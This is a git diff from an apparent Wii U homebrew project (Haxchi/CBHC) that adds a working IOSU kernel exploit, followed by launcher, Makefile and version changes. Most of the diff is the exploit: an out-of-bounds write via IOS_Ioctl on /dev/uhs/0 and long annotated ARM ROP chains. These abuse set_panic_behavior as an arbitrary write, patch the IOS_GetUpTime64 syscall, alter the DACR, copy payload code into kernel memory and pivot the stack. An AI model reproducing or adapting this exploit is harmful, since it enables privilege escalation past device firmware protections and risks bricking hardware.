//!------ROP CHAIN------- + uhs_write32(coreinit_handle, dev_uhs_0_handle, CHAIN_START + 0x14, CHAIN_START + 0x14 + 0x4 + 0x20); + uhs_write32(coreinit_handle, dev_uhs_0_handle, CHAIN_START + 0x10, 0x1011814C); + uhs_write32(coreinit_handle, dev_uhs_0_handle, CHAIN_START + 0xC, SOURCE); + + uhs_write32(coreinit_handle, dev_uhs_0_handle, CHAIN_START, 0x1012392b); // pop {R4-R6,PC} + + IOS_Close(dev_uhs_0_handle); +} + +/* ROP CHAIN STARTS HERE (0x1015BD78) */ +static const int final_chain[] = { + 0x101236f3, // 0x00 POP {R1-R7,PC} + 0x0, // 0x04 arg + 0x0812974C, // 0x08 stackptr CMP R3, #1; STREQ R1, [R12]; BX LR + 0x68, // 0x0C stacksize + 0x10101638, // 0x10 + 0x0, // 0x14 + 0x0, // 0x18 + 0x0, // 0x1C + 0x1010388C, // 0x20 CMP R3, #0; MOV R0, R4; LDMNEFD SP!, {R4,R5,PC} + 0x0, // 0x24 + 0x0, // 0x28 + 0x1012CFEC, // 0x2C MOV LR, R0; MOV R0, LR; ADD SP, SP, #8; LDMFD SP!, {PC} + 0x0, // 0x30 + 0x0, // 0x34 + IOS_CREATETHREAD, // 0x38 + 0x1, // 0x3C + 0x2, // 0x40 + 0x10123a9f, // 0x44 POP {R0,R1,R4,PC} + REPLACE_SYSCALL + 0x00, // 0x48 address: the beginning of syscall_0x1a (IOS_GetUpTime64) + 0xE92D4010, // 0x4C value: PUSH {R4,LR} + 0x0, // 0x50 + 0x10123a8b, // 0x54 POP {R3,R4,PC} + 0x1, // 0x58 R3 must be 1 for the arbitrary write + 0x0, // 0x5C + 0x1010CD18, // 0x60 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} + 0x0, // 0x64 + 0x0, // 0x68 + 0x1012EE64, // 0x6C set_panic_behavior (arbitrary write) + 0x0, // 0x70 + 0x0, // 0x74 + 0x10123a9f, // 0x78 POP {R0,R1,R4,PC} + REPLACE_SYSCALL + 0x04, // 0x7C address: the beginning of syscall_0x1a (IOS_GetUpTime64) + 0xE1A04000, // 0x80 value: MOV R4, R0 + 0x0, // 0x84 + 0x10123a8b, // 0x88 POP {R3,R4,PC} + 0x1, // 0x8C R3 must be 1 for the arbitrary write + 0x0, // 0x90 + 0x1010CD18, // 0x94 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} + 0x0, // 0x98 + 0x0, // 0x9C + 0x1012EE64, // 0xA0 set_panic_behavior (arbitrary write) + 0x0, // 0xA4 + 0x0, // 0xA8 + 0x10123a9f, // 0xAC POP {R0,R1,R4,PC} + REPLACE_SYSCALL + 0x08, // 0xB0 address: the beginning of syscall_0x1a (IOS_GetUpTime64) + 0xE3E00000, // 0xB4 value: MOV R0, #0xFFFFFFFF + 0x0, // 0xB8 + 0x10123a8b, // 0xBC POP {R3,R4,PC} + 0x1, // 0xC0 R3 must be 1 for the arbitrary write + 0x0, // 0xC4 + 0x1010CD18, // 0xC8 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} + 0x0, // 0xCC + 0x0, // 0xD0 + 0x1012EE64, // 0xD4 set_panic_behavior (arbitrary write) + 0x0, // 0xD8 + 0x0, // 0xDC + 0x10123a9f, // 0xE0 POP {R0,R1,R4,PC} + REPLACE_SYSCALL + 0x0C, // 0xE4 address: the beginning of syscall_0x1a (IOS_GetUpTime64) + 0xEE030F10, // 0xE8 value: MCR P15, #0, R0, C3, C0, #0 (set dacr to R0) + 0x0, // 0xEC + 0x10123a8b, // 0xF0 POP {R3,R4,PC} + 0x1, // 0xF4 R3 must be 1 for the arbitrary write + 0x0, // 0xF8 + 0x1010CD18, // 0xFC MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} + 0x0, // 0x100 + 0x0, // 0x104 + 0x1012EE64, // 0x108 set_panic_behavior (arbitrary write) + 0x0, // 0x10C + 0x0, // 0x110 + 0x10123a9f, // 0x114 POP {R0,R1,R4,PC} + REPLACE_SYSCALL + 0x10, // 0x118 address: the beginning of syscall_0x1a (IOS_GetUpTime64) + 0xE1A00004, // 0x11C value: MOV R0, R4 + 0x0, // 0x120 + 0x10123a8b, // 0x124 POP {R3,R4,PC} + 0x1, // 0x128 R3 must be 1 for the arbitrary write + 0x0, // 0x12C + 0x1010CD18, // 0x130 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} + 0x0, // 0x134 + 0x0, // 0x138 + 0x1012EE64, // 0x13C set_panic_behavior (arbitrary write) + 0x0, // 0x140 + 0x0, // 0x144 + 0x10123a9f, // 0x148 POP {R0,R1,R4,PC} + REPLACE_SYSCALL + 0x14, // 0x14C address: the beginning of syscall_0x1a (IOS_GetUpTime64) + 0xE12FFF33, // 0x150 value: BLX R3 KERNEL_MEMCPY + 0x0, // 0x154 + 0x10123a8b, // 0x158 POP {R3,R4,PC} + 0x1, // 0x15C R3 must be 1 for the arbitrary write + 0x0, // 0x160 + 0x1010CD18, // 0x164 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} + 0x0, // 0x168 + 0x0, // 0x16C + 0x1012EE64, // 0x170 set_panic_behavior (arbitrary write) + 0x0, // 0x174 + 0x0, // 0x178 + 0x10123a9f, // 0x148 POP {R0,R1,R4,PC} + REPLACE_SYSCALL + 0x18, // 0x14C address: the beginning of syscall_0x1a (IOS_GetUpTime64) + 0x00000000, // 0x150 value: NOP + 0x0, // 0x154 + 0x10123a8b, // 0x158 POP {R3,R4,PC} + 0x1, // 0x15C R3 must be 1 for the arbitrary write + 0x0, // 0x160 + 0x1010CD18, // 0x164 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} + 0x0, // 0x168 + 0x0, // 0x16C + 0x1012EE64, // 0x170 set_panic_behavior (arbitrary write) + 0x0, // 0x174 + 0x0, // 0x178 + 0x10123a9f, // 0x148 POP {R0,R1,R4,PC} + REPLACE_SYSCALL + 0x1C, // 0x14C address: the beginning of syscall_0x1a (IOS_GetUpTime64) + 0xEE17FF7A, // 0x150 value: clean_loop: MRC p15, 0, r15, c7, c10, 3 + 0x0, // 0x154 + 0x10123a8b, // 0x158 POP {R3,R4,PC} + 0x1, // 0x15C R3 must be 1 for the arbitrary write + 0x0, // 0x160 + 0x1010CD18, // 0x164 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} + 0x0, // 0x168 + 0x0, // 0x16C + 0x1012EE64, // 0x170 set_panic_behavior (arbitrary write) + 0x0, // 0x174 + 0x0, // 0x178 + 0x10123a9f, // 0x148 POP {R0,R1,R4,PC} + REPLACE_SYSCALL + 0x20, // 0x14C address: the beginning of syscall_0x1a (IOS_GetUpTime64) + 0x1AFFFFFD, // 0x150 value: BNE clean_loop + 0x0, // 0x154 + 0x10123a8b, // 0x158 POP {R3,R4,PC} + 0x1, // 0x15C R3 must be 1 for the arbitrary write + 0x0, // 0x160 + 0x1010CD18, // 0x164 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} + 0x0, // 0x168 + 0x0, // 0x16C + 0x1012EE64, // 0x170 set_panic_behavior (arbitrary write) + 0x0, // 0x174 + 0x0, // 0x178 + 0x10123a9f, // 0x148 POP {R0,R1,R4,PC} + REPLACE_SYSCALL + 0x24, // 0x14C address: the beginning of syscall_0x1a (IOS_GetUpTime64) + 0xEE070F9A, // 0x150 value: MCR p15, 0, R0, c7, c10, 4 + 0x0, // 0x154 + 0x10123a8b, // 0x158 POP {R3,R4,PC} + 0x1, // 0x15C R3 must be 1 for the arbitrary write + 0x0, // 0x160 + 0x1010CD18, // 0x164 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} + 0x0, // 0x168 + 0x0, // 0x16C + 0x1012EE64, // 0x170 set_panic_behavior (arbitrary write) + 0x0, // 0x174 + 0x0, // 0x178 + 0x10123a9f, // 0x17C POP {R0,R1,R4,PC} + REPLACE_SYSCALL + 0x28, // 0x180 address: the beginning of syscall_0x1a (IOS_GetUpTime64) + 0xE1A03004, // 0x184 value: MOV R3, R4 + 0x0, // 0x188 + 0x10123a8b, // 0x18C POP {R3,R4,PC} + 0x1, // 0x190 R3 must be 1 for the arbitrary write + 0x0, // 0x194 + 0x1010CD18, // 0x198 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} + 0x0, // 0x19C + 0x0, // 0x1A0 + 0x1012EE64, // 0x1A4 set_panic_behavior (arbitrary write) + 0x0, // 0x1A8 + 0x0, // 0x1AC + 0x10123a9f, // 0x17C POP {R0,R1,R4,PC} + REPLACE_SYSCALL + 0x2C, // 0x180 address: the beginning of syscall_0x1a (IOS_GetUpTime64) + 0xE8BD4010, // 0x184 value: POP {R4,LR} + 0x0, // 0x188 + 0x10123a8b, // 0x18C POP {R3,R4,PC} + 0x1, // 0x190 R3 must be 1 for the arbitrary write + 0x0, // 0x194 + 0x1010CD18, // 0x198 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} + 0x0, // 0x19C + 0x0, // 0x1A0 + 0x1012EE64, // 0x1A4 set_panic_behavior (arbitrary write) + 0x0, // 0x1A8 + 0x0, // 0x1AC + 0x10123a9f, // 0x1B0 POP {R0,R1,R4,PC} + REPLACE_SYSCALL + 0x30, // 0x1B4 address: the beginning of syscall_0x1a (IOS_GetUpTime64) + 0xE12FFF13, // 0x1B8 value: BX R3 our code :-) + 0x0, // 0x1BC + 0x10123a8b, // 0x1C0 POP {R3,R4,PC} + 0x1, // 0x1C4 R3 must be 1 for the arbitrary write + 0x0, // 0x1C8 + 0x1010CD18, // 0x1CC MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} + 0x0, // 0x1D0 + 0x0, // 0x1D4 + 0x1012EE64, // 0x1D8 set_panic_behavior (arbitrary write) + 0x0, // 0x1DC + 0x0, // 0x1E0 + 0x10123a9f, // 0x1E4 POP {R0,R1,R4,PC} + REPLACE_SYSCALL, // 0x1DC start of syscall IOS_GetUpTime64 + 0x4001, // 0x1E0 on > 0x4000 it flushes all data caches + 0x0, // 0x1E0 + 0x1012ED4C, // 0x1E4 IOS_FlushDCache(void *ptr, unsigned int len) + 0x0, // 0x1DC + 0x0, // 0x1E0 + 0x10123a9f, // 0x1E4 POP {R0,R1,R4,PC} + ARM_CODE_BASE, // 0x1E8 our code destination address + 0x0, // 0x1EC + 0x0, // 0x1F0 + 0x101063db, // 0x1F4 POP {R1,R2,R5,PC} + 0x0, // 0x1F8 + sizeof(arm_kernel_bin), // 0x1FC our code size + 0x0, // 0x200 + 0x10123983, // 0x204 POP {R1,R3,R4,R6,PC} + 0x01E40000, // 0x208 our code source location + 0x08131D04, // 0x20C KERNEL_MEMCPY address + 0x0, // 0x210 + 0x0, // 0x214 + 0x1012EBB4, // 0x218 IOS_GetUpTime64 (privileged stack pivot) + 0x0, + 0x0, + 0x101312D0, +}; + +static const int second_chain[] = { + 0x10123a9f, // 0x00 POP {R0,R1,R4,PC} + CHAIN_START + 0x14 + 0x4 + 0x20 - 0xF000, // 0x04 destination + 0x0, // 0x08 + 0x0, // 0x0C + 0x101063db, // 0x10 POP {R1,R2,R5,PC} + 0x01E30000, // 0x14 source + sizeof(final_chain), // 0x18 length + 0x0, // 0x1C + 0x10106D4C, // 0x20 BL MEMCPY; MOV R0, #0; LDMFD SP!, {R4,R5,PC} + 0x0, // 0x24 + 0x0, // 0x28 + 0x101236f3, // 0x2C POP {R1-R7,PC} + 0x0, // 0x30 arg + 0x101001DC, // 0x34 stackptr + 0x68, // 0x38 stacksize + 0x10101634, // 0x3C proc: ADD SP, SP, #8; LDMFD SP!, {R4,R5,PC} + 0x0, // 0x40 + 0x0, // 0x44 + 0x0, // 0x48 + 0x1010388C, // 0x4C CMP R3, #0; MOV R0, R4; LDMNEFD SP!, {R4,R5,PC} + 0x0, // 0x50 + 0x0, // 0x54 + 0x1012CFEC, // 0x58 MOV LR, R0; MOV R0, LR; ADD SP, SP, #8; LDMFD SP!, {PC} + 0x0, // 0x5C + 0x0, // 0x60 + IOS_CREATETHREAD, // 0x64 + 0x1, // 0x68 priority + 0x2, // 0x6C flags + 0x0, // 0x70 + 0x0, // 0x74 + 0x101063db, // 0x78 POP {R1,R2,R5,PC} + 0x0, // 0x7C + -(0x240 + 0x18 + 0xF000), // 0x80 stack offset + 0x0, // 0x84 + 0x101141C0, // 0x88 MOV R0, R9; ADD SP, SP, #0xC; LDMFD SP!, {R4-R11,PC} + 0x0, + 0x0, + 0x0, + 0x00110000 - 0x44, // 0x8C + 0x00110010, // 0x90 + 0x0, // 0x94 + 0x0, // 0x98 + 0x0, // 0x9C + 0x0, // 0xA0 + 0x0, // 0xA4 + 0x4, // 0xA8 R11 must equal 4 in order to pivot the stack + 0x101088F4, // STR R0, [R4,#0x44]; MOVEQ R0, R5; STRNE R3, [R5]; LDMFD SP!, {R4,R5,PC} + 0x0, + 0x0, + 0x1012EA68, // 0xAC stack pivot +}; + +static void uhs_exploit_init(unsigned int coreinit_handle) +{ + void (*DCStoreRange)(const void *addr, uint32_t length); + OSDynLoad_FindExport(coreinit_handle, 0, "DCStoreRange", &DCStoreRange); + + //! Clear out our used MEM1 area + memset((void*)0xF5E00000, 0, 0x00070000); + DCStoreRange((void*)0xF5E00000, 0x00070000); + + //!------Variables used in exploit------ + int *pretend_root_hub = (int*)0xF5E60640; + int *ayylmao = (int*)0xF5E00000; + //!------------------------------------- + + ayylmao[5] = 1; + ayylmao[8] = 0x1E00000; + + memcpy((char*)(0xF5E20000), second_chain, sizeof(second_chain)); + memcpy((char*)(0xF5E30000), final_chain, sizeof(final_chain)); + memcpy((char*)(0xF5E40000), arm_kernel_bin, sizeof(arm_kernel_bin)); + memcpy((char*)(0xF5E50000), arm_user_bin, sizeof(arm_user_bin)); + + pretend_root_hub[33] = 0x1E00000; + pretend_root_hub[78] = 0; + + //! Store current CPU cache into main memory for IOSU to read + DCStoreRange(ayylmao, 0x840); + + DCStoreRange((void*)0xF5E20000, sizeof(second_chain)); + DCStoreRange((void*)0xF5E30000, sizeof(final_chain)); + DCStoreRange((void*)0xF5E40000, sizeof(arm_kernel_bin)); + DCStoreRange((void*)0xF5E50000, sizeof(arm_user_bin)); + + DCStoreRange(pretend_root_hub, 0x160); +} + +static int uhs_write32(unsigned int coreinit_handle, int dev_uhs_0_handle, int arm_addr, int val) +{ + void (*DCStoreRange)(const void *addr, uint32_t length); + void (*OSSleepTicks)(uint64_t ticks); + int (*IOS_Ioctl)(int fd, uint32_t request, void *input_buffer,uint32_t input_buffer_len, void *output_buffer, uint32_t output_buffer_len); + OSDynLoad_FindExport(coreinit_handle, 0, "DCStoreRange", &DCStoreRange); + OSDynLoad_FindExport(coreinit_handle, 0, "OSSleepTicks", &OSSleepTicks); + OSDynLoad_FindExport(coreinit_handle, 0, "IOS_Ioctl", &IOS_Ioctl); + + //!------Variables used in exploit------ + int *ayylmao = (int*)0xF5E00000; + //!------------------------------------- + + ayylmao[520] = arm_addr - 24; //! The address to be overwritten, minus 24 bytes + DCStoreRange(ayylmao, 0x840); //! Store current CPU cache into main memory for IOSU to read + OSSleepTicks(0x200000); //! Wait for caches to refresh over in IOSU + //! index 0 is at 0x10149A6C, each index is 0x144 bytes long, so 0x10149A6C - (0x144*0xB349B) = 0x1E60640, + //! which is the physical address of 0xF5E60640 for us, right at the end of MEM1 + int request_buffer[] = { -(0xB349B), val }; + int output_buffer[32]; + return IOS_Ioctl(dev_uhs_0_handle, 0x15, request_buffer, sizeof(request_buffer), output_buffer, sizeof(output_buffer)); +} diff --git a/dsrom/CBHC/titleprot/Makefile b/dsrom/iosu_patcher/titleprot/Makefile similarity index 100% rename from dsrom/CBHC/titleprot/Makefile rename to dsrom/iosu_patcher/titleprot/Makefile diff --git a/dsrom/CBHC/titleprot/ccd00.ld b/dsrom/iosu_patcher/titleprot/ccd00.ld similarity index 100% rename from dsrom/CBHC/titleprot/ccd00.ld rename to dsrom/iosu_patcher/titleprot/ccd00.ld diff --git a/dsrom/CBHC/titleprot/ccd00.specs b/dsrom/iosu_patcher/titleprot/ccd00.specs similarity index 100% rename from dsrom/CBHC/titleprot/ccd00.specs rename to dsrom/iosu_patcher/titleprot/ccd00.specs diff --git a/dsrom/CBHC/titleprot/source/crt0.s b/dsrom/iosu_patcher/titleprot/source/crt0.s similarity index 100% rename from dsrom/CBHC/titleprot/source/crt0.s rename to dsrom/iosu_patcher/titleprot/source/crt0.s diff --git a/dsrom/cfw_booter/types.h b/dsrom/iosu_patcher/types.h similarity index 94% rename from dsrom/cfw_booter/types.h rename to dsrom/iosu_patcher/types.h index e9194b3..828591e 100644 --- a/dsrom/cfw_booter/types.h +++ b/dsrom/iosu_patcher/types.h @@ -17,6 +17,4 @@ typedef _Bool bool; #define false 0 #define null 0 -#define NULL (void*)0 - #endif /* TYPES_H */ diff --git a/dsrom/option_select/Makefile b/dsrom/option_select/Makefile index a512614..ae0c1e8 100644 --- a/dsrom/option_select/Makefile +++ b/dsrom/option_select/Makefile @@ -12,8 +12,6 @@ project := . root := $(CURDIR) build := $(root)/bin -CFLAGS += -DUSE_SD_LOADER -ASFLAGS += -DUSE_SD_LOADER FIRMWARE = 550 all: clean setup main @@ -26,9 +24,9 @@ main: $(AS) $(ASFLAGS) -DVER=$(FIRMWARE) -c $(project)/crt0.S cp -r $(root)/*.o $(build) rm $(root)/*.o - $(LD) -o code$(FIRMWARE).elf $(build)/crt0.o `find $(build) -name "*.o" ! -name "crt0.o"` $(LDFLAGS) -Map code.map - $(OBJCOPY) code$(FIRMWARE).elf -S -O binary ../code$(FIRMWARE).bin + $(LD) -o option_select.elf $(build)/crt0.o `find $(build) -name "*.o" ! -name "crt0.o"` $(LDFLAGS) -Map option_select.map + $(OBJCOPY) option_select.elf -S -O binary ../option_select.bin clean: rm -rf $(build) - rm -rf code$(FIRMWARE).elf code.map + rm -rf option_select.elf option_select.map diff --git a/dsrom/option_select/main.c b/dsrom/option_select/main.c index ac15e8e..9921c31 100644 --- a/dsrom/option_select/main.c +++ b/dsrom/option_select/main.c @@ -7,6 +7,7 @@ #include #include "types.h" #include "coreinit.h" +#include "../global.h" typedef struct { @@ -111,7 +112,7 @@ uint32_t __main(void) void*(*MEMAllocFromDefaultHeap)(int size) = (void*)(*pMEMAllocFromDefaultHeap); void(*MEMFreeToDefaultHeap)(void *ptr) = (void*)(*pMEMFreeToDefaultHeap); - int hbl = 1; + int launchmode = LAUNCH_HBL; //default path goes to HBL strcpy((void*)0xF5E70000,"/vol/external01/wiiu/apps/homebrew_launcher/homebrew_launcher.elf"); @@ -229,7 +230,7 @@ uint32_t __main(void) } else __os_snprintf((void*)0xF5E70000,32,"/vol/sdcard"); - hbl = 0; + launchmode = LAUNCH_CFW_IMG; break; } else if(memcmp(FnameChar+fLen-4,".elf",5) == 0) @@ -238,6 +239,12 @@ uint32_t __main(void) __os_snprintf((void*)0xF5E70000,250,"/vol/external01%s",FnameChar); else __os_snprintf((void*)0xF5E70000,250,"/vol/external01/%s",FnameChar); + launchmode = LAUNCH_HBL; + break; + } + else if(memcmp(FnameChar+fLen-7,"sysmenu",8) == 0) + { + launchmode = LAUNCH_SYSMENU; break; } } @@ -256,7 +263,32 @@ fileEnd: if(pBuffer) MEMFreeToDefaultHeap(pBuffer); - DCStoreRange((void*)0xF5E70000,0x100); - uint32_t entry = (hbl ? 0x01800000 : 0x0180C000); - return entry; + if(launchmode == LAUNCH_HBL) + return 0x01800000; + + //store path to sd fw.img for arm_kernel + if(launchmode == LAUNCH_CFW_IMG) + DCStoreRange((void*)0xF5E70000,0x100); + + unsigned int sysapp_handle; + OSDynLoad_Acquire("sysapp.rpl", &sysapp_handle); + void (*SYSLaunchMenu)(void); + OSDynLoad_FindExport(sysapp_handle, 0,"SYSLaunchMenu", &SYSLaunchMenu); + + int (*OSForceFullRelaunch)(void); + OSDynLoad_FindExport(coreinit_handle, 0, "OSForceFullRelaunch", &OSForceFullRelaunch); + + void (*OSExitThread)(int); + OSDynLoad_FindExport(coreinit_handle, 0, "OSExitThread", &OSExitThread); + + //do iosu patches + void (*patch_iosu)(unsigned int coreinit_handle, unsigned int sysapp_handle, int launchmode, int from_cbhc) = (void*)0x01804000; + patch_iosu(coreinit_handle, sysapp_handle, launchmode, 0); + + if(launchmode == LAUNCH_CFW_IMG) + OSForceFullRelaunch(); + SYSLaunchMenu(); + + OSExitThread(0); + return 0; } diff --git a/installer/src/main.c b/installer/src/main.c index 0ba1e11..b506d02 100644 --- a/installer/src/main.c +++ b/installer/src/main.c @@ -125,9 +125,9 @@ int availSort(const void *c1, const void *c2) void printhdr_noflip() { #ifdef CB - println_noflip(0,"CBHC v1.4 by FIX94"); + println_noflip(0,"CBHC v1.4u1 by FIX94"); #else - println_noflip(0,"Haxchi v2.3u1 by FIX94"); + println_noflip(0,"Haxchi v2.4 by FIX94"); #endif println_noflip(1,"Credits to smea, plutoo, yellows8, naehrwert, derrek and dimok"); } diff --git a/release/haxchi/config.txt b/release/haxchi/config.txt index 03cfa68..c529f89 100644 --- a/release/haxchi/config.txt +++ b/release/haxchi/config.txt @@ -1,2 +1,3 @@ a=fw.img +b=sysmenu default=wiiu/apps/homebrew_launcher/homebrew_launcher.elf \ No newline at end of file diff --git a/release/wiiu/apps/cbhc/meta.xml b/release/wiiu/apps/cbhc/meta.xml index 61ec169..4a55413 100644 --- a/release/wiiu/apps/cbhc/meta.xml +++ b/release/wiiu/apps/cbhc/meta.xml @@ -2,9 +2,9 @@ CBHC FIX94 - 1.4 + 1.4u1 https://github.com/FIX94/haxchi - 20161216200000 + 20161219200000 Coldboot Haxchi Installer WARNING! This will install Coldboot Haxchi on your system. ONLY USE THIS IF YOU ARE WILLING TO TAKE A RISK OF BRICKING YOUR CONSOLE. diff --git a/release/wiiu/apps/haxchi/meta.xml b/release/wiiu/apps/haxchi/meta.xml index 6c44504..9fbc725 100644 --- a/release/wiiu/apps/haxchi/meta.xml +++ b/release/wiiu/apps/haxchi/meta.xml @@ -2,9 +2,9 @@ Haxchi FIX94 - 2.3u1 + 2.4 https://github.com/FIX94/haxchi - 20161213200000 + 20161219200000 Haxchi Installer This will install Haxchi on your system.